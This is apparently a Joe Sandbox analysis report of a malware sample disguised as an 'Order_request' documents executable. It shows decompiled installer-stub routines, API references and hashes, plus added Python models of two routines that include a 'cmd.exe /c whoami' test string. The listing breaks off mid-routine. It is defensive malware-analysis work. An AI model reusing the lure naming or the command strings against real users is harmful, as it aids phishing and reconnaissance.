                                                • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000,00403258,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 0040633D
                                                • CharPrevW.USER32(0040A300,0040A300,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000,00403258,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 00406350
                                                Strings
                                                • "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", xrefs: 0040630A
                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004062C7
                                                • *?|<>/":, xrefs: 00406318
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                • API String ID: 589700163-2447577730
                                                • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                • Instruction ID: d4b317f752b3f13875bb624486170839a033bb9266efc580798c69349bd43794
                                                • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                • Instruction Fuzzy Hash: 4611041580061295DB307B148D40AB7A2B8FF95754F42803FED86732C0E77C9CA286ED
                                                Uniqueness

                                                Uniqueness Score: -1.00%
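The routine E004062C6 above decides which characters of a candidate path the installer stub keeps before touching the file system, which matters when you want to predict the on-disk name of a dropped file from a string recovered from the sample. The following is an added example written by the editor, not code from the Joe Sandbox report or from the analysed sample: a readable Python re-implementation of the same sanitiser so the result can be checked offline. The helper names are the editor's own, and the behaviour of the unshown subcall E00405A5D (a two-character drive or UNC spec that is left untouched) is an assumption, marked as such in the code.

```python
# Added example (editor's own, not code from the Joe Sandbox report or the
# analysed sample): a readable re-implementation of the filename sanitiser
# decompiled as E004062C6. Helper names are the editor's; the behaviour of
# the unshown subcall E00405A5D is an assumption noted on has_path_spec().

INVALID_CHARS = '*?|<>/":'   # the literal the routine searches with E00405A13


def has_path_spec(s: str) -> bool:
    """Stand-in for the unshown subcall E00405A5D.
    Assumption: true for a drive spec ("C:") or a UNC lead-in ("\\\\"),
    i.e. a two-character prefix whose ':' must survive the filter."""
    if len(s) < 2:
        return False
    if s[0] == '\\' and s[1] == '\\':
        return True
    return s[0].lower() in 'abcdefghijklmnopqrstuvwxyz' and s[1] == ':'


def sanitize_filename(path: str) -> str:
    """Mirror of E004062C6: strip a \\?\ prefix, keep a path spec, drop
    control characters and the eight reserved characters, then trim
    trailing spaces and backslashes (backslash itself is *not* filtered)."""
    # 1. drop a leading extended-length prefix  \\?\
    if path.startswith('\\\\?\\'):
        path = path[4:]
    # 2. a drive or UNC spec is kept verbatim (it contains ':' or '\\')
    prefix = ''
    if path and has_path_spec(path):
        prefix, path = path[:2], path[2:]
    # 3. the in-place compaction loop: keep chars > 0x1f not in the reserved set
    kept = ''.join(c for c in path if ord(c) > 0x1f and c not in INVALID_CHARS)
    # 4. the CharPrevW loop: erase trailing ' ' and '\\' back to the region start
    kept = kept.rstrip(' \\')
    return prefix + kept


def dropped_chars(path: str) -> list:
    """Characters the filter step discards (the trailing trim is not counted);
    useful when reasoning about why a recovered path and the dropped file differ."""
    if path.startswith('\\\\?\\'):
        path = path[4:]
    body = path[2:] if path and has_path_spec(path) else path
    return [c for c in body if ord(c) <= 0x1f or c in INVALID_CHARS]


if __name__ == "__main__":
    # constructed sample inputs, not strings taken from the report
    for p in ('\\\\?\\C:\\Temp\\bad:name?.exe \\', 'file<1>.txt   ', '\\\\srv\\share\\x/y'):
        print(repr(p), '->', repr(sanitize_filename(p)), 'dropped', dropped_chars(p))
```

The one behaviour worth remembering from this is that the backslash is not in the reserved set, so an attacker-chosen string containing directory separators passes through unchanged; only the trailing backslashes and spaces are trimmed.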

                                                C-Code - Quality: 100%
			// WM_CTLCOLOR* handler for dialog controls: reads a per-control colour record
			// stored in the window's GWL_USERDATA and applies it to the device context.
			// Editor's reading; the field and flag meanings below are inferred from the use sites.
			E0040415D(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				// _a4 + 0xfffffecd == _a4 - 0x133: only messages 0x133..0x138
				// (WM_CTLCOLOREDIT .. WM_CTLCOLORSTATIC) are handled.
				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongW(_a12, 0xffffffeb);   // 0xffffffeb == -21 == GWL_USERDATA
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;                        // [0] text colour (COLORREF or COLOR_* index)
				if((_t49[5] & 0x00000002) != 0) {     // [5] flags; bit 1: text colour is a COLOR_* index
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {     // bit 0: apply the text colour
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);              // [4] background mode (TRANSPARENT/OPAQUE)
				_t37 = _t49[1];                       // [1] background colour
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {     // bit 3: background colour is a COLOR_* index
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {     // bit 2: apply the background colour
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {     // bit 4: (re)create the background brush
					_v16.lbStyle = _t49[2];           // [2] brush style
					_t40 = _t49[3];                   // [3] previously created brush, if any
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];                       // brush handle handed back to the dialog procedure
			}

                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040417A
                                                • GetSysColor.USER32(00000000), ref: 00404196
                                                • SetTextColor.GDI32(?,00000000), ref: 004041A2
                                                • SetBkMode.GDI32(?,?), ref: 004041AE
                                                • GetSysColor.USER32(?), ref: 004041C1
                                                • SetBkColor.GDI32(?,?), ref: 004041D1
                                                • DeleteObject.GDI32(?), ref: 004041EB
                                                • CreateBrushIndirect.GDI32(?), ref: 004041F5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                • Instruction ID: 369debbde0f7a754f16ab48c9af260ce6490938065ace01aa15cf7b70dd2699c
                                                • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                • Instruction Fuzzy Hash: 5F218EB1500704ABCB219F68DE08B5BBBF8AF41710F04892DF996E66A0C734E948CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
			// Tree-view helper: returns the lParam of the selected item or, when _a8 is
			// non-zero, of the item under the mouse; returns -1 if the click did not land
			// on an item. Editor's reading; the message numbers are the documented TVM_* values.
			E00404A5B(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;              // TVHITTESTINFO.hItem
				signed char _v12;      // TVHITTESTINFO.flags
				unsigned int _v16;     // TVHITTESTINFO.pt.y
				void* _v20;            // TVHITTESTINFO.pt.x
				intOrPtr _v24;         // TVITEMW.lParam
				long _v56;             // TVITEMW.hItem
				void* _v60;            // TVITEMW.mask
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);   // TVM_GETNEXTITEM with TVGN_CARET: the selected item
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;                                   // TVIF_PARAM
					SendMessageW(_t28, 0x113e, 0,  &_v60);      // TVM_GETITEMW
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;   // y from the high word
				_v20 = _t19;           // x from the low word
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);   // TVM_HITTEST
				// 0x66 = TVHT_ONITEMICON | TVHT_ONITEMLABEL | TVHT_ONITEMRIGHT | TVHT_ONITEMSTATEICON
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;   // the item that was hit
					goto L4;
				}
				return _t25 | 0xffffffff;   // -1: the click was not on an item
			}

                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A76
                                                • GetMessagePos.USER32 ref: 00404A7E
                                                • ScreenToClient.USER32 ref: 00404A98
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAA
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                • Instruction ID: c6f788746afe21c260c1d9be26cb74e88d19e7ad1034c01b3b76a28530fb3a8b
                                                • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                • Instruction Fuzzy Hash: 37019E71A4021CBADB00DB94DD81FFEBBFCAF54B10F10002BBA11B61C0C7B49A418BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E007E1849(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                				int _v8;
                                                				int _t14;
                                                				WCHAR* _t16;
                                                				WCHAR* _t17;
                                                				int _t18;
                                                				int _t23;
                                                				WCHAR* _t31;
                                                
                                                				_t14 = lstrlenW(_a8);
                                                				_t31 = _a4;
                                                				_t23 = _t14;
                                                				_v8 = _t23;
                                                				if(lstrlenW(_t31) < _t23) {
                                                					L5:
                                                					_t16 = 0;
                                                				} else {
                                                					_t17 = _t23 + _t23;
                                                					_a4 = _t17;
                                                					while(1) {
                                                						 *(_t17 + _t31) =  *(_t17 + _t31) & 0x00000000;
                                                						_t18 = lstrcmpiW(_t31, _a8);
                                                						 *((short*)(_a4 + _t31)) =  *(_t17 + _t31);
                                                						if(_t18 == 0) {
                                                							break;
                                                						}
                                                						_t31 = CharNextW(_t31);
                                                						if(lstrlenW(_t31) >= _v8) {
                                                							_t17 = _a4;
                                                							continue;
                                                						} else {
                                                							goto L5;
                                                						}
                                                						goto L6;
                                                					}
                                                					_t16 = _t31;
                                                				}
                                                				L6:
                                                				return _t16;
                                                			}










                                                0x007e1859
                                                0x007e185b
                                                0x007e185e
                                                0x007e1861
                                                0x007e1868
                                                0x007e18a4
                                                0x007e18a4
                                                0x007e186a
                                                0x007e186a
                                                0x007e186d
                                                0x007e1875
                                                0x007e187c
                                                0x007e1882
                                                0x007e188d
                                                0x007e1891
                                                0x00000000
                                                0x00000000
                                                0x007e189a
                                                0x007e18a2
                                                0x007e1872
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x007e18a2
                                                0x007e18ab
                                                0x007e18ab
                                                0x007e18a6
                                                0x007e18aa

                                                APIs
                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,007E12F5,00000000,/TIMEOUT=,00000000), ref: 007E1859
                                                • lstrlenW.KERNEL32(?,?,?,007E12F5,00000000,/TIMEOUT=,00000000), ref: 007E1864
                                                • lstrcmpiW.KERNEL32(?,?,?,?,007E12F5,00000000,/TIMEOUT=,00000000), ref: 007E1882
                                                • CharNextW.USER32(?,?,?,007E12F5,00000000,/TIMEOUT=,00000000), ref: 007E1894
                                                • lstrlenW.KERNEL32(00000000,?,?,007E12F5,00000000,/TIMEOUT=,00000000), ref: 007E189D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.512316824.00000000007E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007E0000, based on PE: true
                                                • Associated: 00000000.00000002.512304950.00000000007E0000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.512325440.00000000007E2000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.512337115.00000000007E3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.512347213.00000000007E4000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7e0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID: i)w
                                                • API String ID: 190613189-1280834553
                                                • Opcode ID: 0dccf5aa36bac529db8ba63558757bd8223a214f62756a2cf846171472bbd0d1
                                                • Instruction ID: b89359cc8c2992788578802cf2799a47f204337d5cb45beebe0649a10aed415e
                                                • Opcode Fuzzy Hash: 0dccf5aa36bac529db8ba63558757bd8223a214f62756a2cf846171472bbd0d1
                                                • Instruction Fuzzy Hash: FA018131602158FFDB11DFA5CC809AD77A8FF093A07658065F904DB221D774DA42DB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%
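The routine E007E1849 above is a case-insensitive substring search working in place on a WCHAR buffer: at each position it writes a NUL at haystack[len(needle)], calls lstrcmpiW against the needle, steps forward with CharNextW on a mismatch, and gives up (returning 0) once the remaining haystack is shorter than the needle. The caller at 007E12F5 passes the string "/TIMEOUT=", so this is how the plugin locates that option inside its parameter string. The Python below is an added reference model written for this page, not code from the report or from the sample; it mirrors the decompiled control flow so an analyst can check expected hits and misses against the native routine. Two points are assumptions: that the store the decompiler renders as a self-assignment restores the overwritten character, and that the caller parses a decimal value after "/TIMEOUT=" (the report shows only the string xref). The `casefold()` compare and the one-code-point step approximate lstrcmpiW and CharNextW; they agree for the ASCII option strings involved here.

```python
"""Reference model of E007E1849 (added example, not from the sandbox report)."""
from typing import Optional


def lstrcmpi_equal(a: str, b: str) -> bool:
    """Model of lstrcmpiW(a, b) == 0.  Case folding approximates the
    locale-aware Win32 compare; identical for ASCII input."""
    return a.casefold() == b.casefold()


def find_ci(haystack: str, needle: str) -> Optional[int]:
    """Return the index where `needle` first matches `haystack`
    case-insensitively, or None (the native routine returns 0 instead).

    Mirrors E007E1849: _v8 = lstrlenW(needle); loop while the remaining
    text is at least that long; truncate, compare, restore, CharNextW.
    """
    buf = list(haystack)          # stands in for the writable WCHAR buffer
    n = len(needle)               # _v8
    pos = 0                       # _t31 walks the buffer
    while len(buf) - pos >= n:    # lstrlenW(_t31) >= _v8, else return 0
        cut = pos + n
        saved = buf[cut] if cut < len(buf) else None
        if saved is not None:
            buf[cut] = "\0"       # *(_t17 + _t31) &= 0: temporary terminator
        candidate = "".join(buf[pos:cut])   # what lstrcmpiW now sees
        if saved is not None:
            buf[cut] = saved      # restore (assumed; decompiler lost the temp)
        if lstrcmpi_equal(candidate, needle):
            return pos            # _t16 = _t31
        pos += 1                  # CharNextW (one code unit for BMP text)
    return None                   # L5: _t16 = 0


def timeout_option(params: str) -> Optional[int]:
    """Assumed caller behaviour at 007E12F5: locate '/TIMEOUT=' and read
    the decimal value that follows.  Only the xref is visible in the report."""
    key = "/TIMEOUT="
    i = find_ci(params, key)
    if i is None:
        return None
    digits = ""
    for ch in params[i + len(key):]:
        if not ch.isdigit():
            break
        digits += ch
    return int(digits) if digits else None


if __name__ == "__main__":
    # Constructed parameter strings, not taken from the sample.
    for p in ("/timeout=5000 cmd.exe /c whoami",
              "cmd.exe /c x /Timeout=300",
              "cmd.exe /c dir"):
        print(repr(p), "->", find_ci(p, "/TIMEOUT="), timeout_option(p))
```

Because the native routine mutates the caller's buffer, a hit leaves the string intact only if the restore happens on every path; the model keeps that property, which is worth confirming in the disassembly if the plugin's parameter string is reused afterwards.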

                                                C-Code - Quality: 100%
                                                			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
                                                				_Unknown_base(*)()* _t7;
                                                				void* _t10;
                                                				int _t14;
                                                
                                                				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                				_t10 = GlobalAlloc(0x40, _t14);
                                                				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                				_t7 = GetProcAddress(_a4, _t10);
                                                				GlobalFree(_t10);
                                                				return _t7;
                                                			}






                                                0x10001619
                                                0x10001625
                                                0x10001632
                                                0x10001639
                                                0x10001642
                                                0x1000164e

                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                • GlobalFree.KERNEL32 ref: 10001642
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID: N)w@h)w
                                                • API String ID: 1148316912-3621727588
                                                • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00402D04(struct HWND__* _a4, intOrPtr _a8) {
                                                				short _v132;
                                                				int _t11;
                                                				int _t20;
                                                
                                                				if(_a8 == 0x110) {
                                                					SetTimer(_a4, 1, 0xfa, 0);
                                                					_a8 = 0x113;
                                                				}
                                                				if(_a8 == 0x113) {
                                                					_t20 =  *0x78b6f4; // 0x24cc4
                                                					_t11 =  *0x7976fc; // 0x253b8
                                                					if(_t20 >= _t11) {
                                                						_t20 = _t11;
                                                					}
                                                					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                					SetWindowTextW(_a4,  &_v132);
                                                					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                				}
                                                				return 0;
                                                			}






                                                0x00402d14
                                                0x00402d22
                                                0x00402d28
                                                0x00402d28
                                                0x00402d36
                                                0x00402d38
                                                0x00402d3e
                                                0x00402d45
                                                0x00402d47
                                                0x00402d47
                                                0x00402d5d
                                                0x00402d6d
                                                0x00402d7f
                                                0x00402d7f
                                                0x00402d87

                                                APIs
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402D57
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: 0571604055d31c6dff79b789c0d870111b8eec90378702650be5945f1294d07a
                                                • Instruction ID: d409429b390960081b576047ff97edc042c2651f1908c05eaab55558fb75af6b
                                                • Opcode Fuzzy Hash: 0571604055d31c6dff79b789c0d870111b8eec90378702650be5945f1294d07a
                                                • Instruction Fuzzy Hash: 1B01447064020DAFEF149F61DD49BEA3B69AF04304F008039FA45A91D0DBB89955CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 76%
                                                			E100024A9(intOrPtr* _a4) {
                                                				intOrPtr _v4;
                                                				intOrPtr* _t24;
                                                				void* _t26;
                                                				intOrPtr _t27;
                                                				signed int _t35;
                                                				void* _t39;
                                                				intOrPtr _t40;
                                                				void* _t43;
                                                
                                                				_t39 = E1000121B();
                                                				_t24 = _a4;
                                                				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
                                                				_v4 = _t40;
                                                				_t43 = (_t40 + 0x81 << 5) + _t24;
                                                				do {
                                                					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
                                                					}
                                                					_t35 =  *(_t43 - 8);
                                                					if(_t35 <= 7) {
                                                						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B9))) {
                                                							case 0:
                                                								 *_t39 =  *_t39 & 0x00000000;
                                                								goto L15;
                                                							case 1:
                                                								_push( *__eax);
                                                								goto L13;
                                                							case 2:
                                                								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                								goto L14;
                                                							case 3:
                                                								__ecx =  *0x1000406c;
                                                								__edx = __ecx - 1;
                                                								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
                                                								__eax =  *0x1000406c;
                                                								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
                                                								goto L15;
                                                							case 4:
                                                								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
                                                								goto L15;
                                                							case 5:
                                                								_push( *0x1000406c);
                                                								_push(__edi);
                                                								_push( *__eax);
                                                								__imp__StringFromGUID2();
                                                								goto L15;
                                                							case 6:
                                                								_push( *__esi);
                                                								L13:
                                                								__eax = wsprintfW(__edi, __ebp);
                                                								L14:
                                                								__esp = __esp + 0xc;
                                                								goto L15;
                                                						}
                                                					}
                                                					L15:
                                                					_t26 =  *(_t43 + 0x14);
                                                					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                						GlobalFree(_t26);
                                                					}
                                                					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                					if(_t27 != 0) {
                                                						if(_t27 != 0xffffffff) {
                                                							if(_t27 > 0) {
                                                								E100012E1(_t27 - 1, _t39);
                                                								goto L24;
                                                							}
                                                						} else {
                                                							E10001272(_t39);
                                                							L24:
                                                						}
                                                					}
                                                					_v4 = _v4 - 1;
                                                					_t43 = _t43 - 0x20;
                                                				} while (_v4 >= 0);
                                                				return GlobalFree(_t39);
                                                			}











                                                0x100024b3
                                                0x100024b5
                                                0x100024c4
                                                0x100024ca
                                                0x100024d7
                                                0x100024d9
                                                0x100024dd
                                                0x100024dd
                                                0x100024e5
                                                0x100024eb
                                                0x100024ed
                                                0x00000000
                                                0x100024f4
                                                0x00000000
                                                0x00000000
                                                0x100024fa
                                                0x00000000
                                                0x00000000
                                                0x10002504
                                                0x00000000
                                                0x00000000
